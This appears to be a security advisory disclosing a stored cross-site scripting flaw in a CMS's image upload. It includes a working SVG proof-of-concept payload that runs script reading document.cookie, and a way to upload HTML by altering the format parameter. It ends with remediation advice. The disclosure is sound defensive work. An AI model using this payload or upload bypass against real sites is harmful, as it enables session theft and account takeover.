GHSA-r9cr-qmfw-pmrc

A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to documents or a string of an unsupported format. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf (e.g. changing or deleting content inside of the CMS.)

Proof of concept Login as a normal user (if user signup is enabled). Go to the user's profile. And upload the following profile picture via drag and drop. The content of the SVG file could be as follows (e.g. name it test-xss.svg):

<?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" width="500" height="500" viewBox="0 0 198.4375 52.916666" version="1.1"> <g transform="translate(-9.8676114,4.8833333)"> <path d="m 107.79557,-10.430538 -7.33315,-0.02213 -3.647402,-6.361755 3.685742,-6.339624 7.33314,0.02213 3.64741,6.361756 z" style="fill:#131f6b;fill-opacity:1;stroke-width:0.05937638" transform="scale(1,-1)" /> <!-- The below lines were added in a text editor to the image XML. This is the stored XSS attack. --> <script type="text/javascript"> alert("This is an example of a stored XSS attack in an SVG image, here's the cookie: " + document.cookie); </script> </g> </svg> The server might fail with a 500 internal server error, but the uploaded image should be available at a location like https://<camaleon-host>/media/1/test-xss-cookie.svg. If an authenticated user or administrator accesses that link their authtoken is reflected. Since the authtoken cookie contains a static auth token value that only changes when a user changes their password.

Impact This issue may lead to account takeover due to reflected Cross-site scripting (XSS).

Remediation Only allow the upload of safe files such as PNG, TXT and others or serve all "unsafe" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.

Additionally, a Content security policy (CSP) can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)

To prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.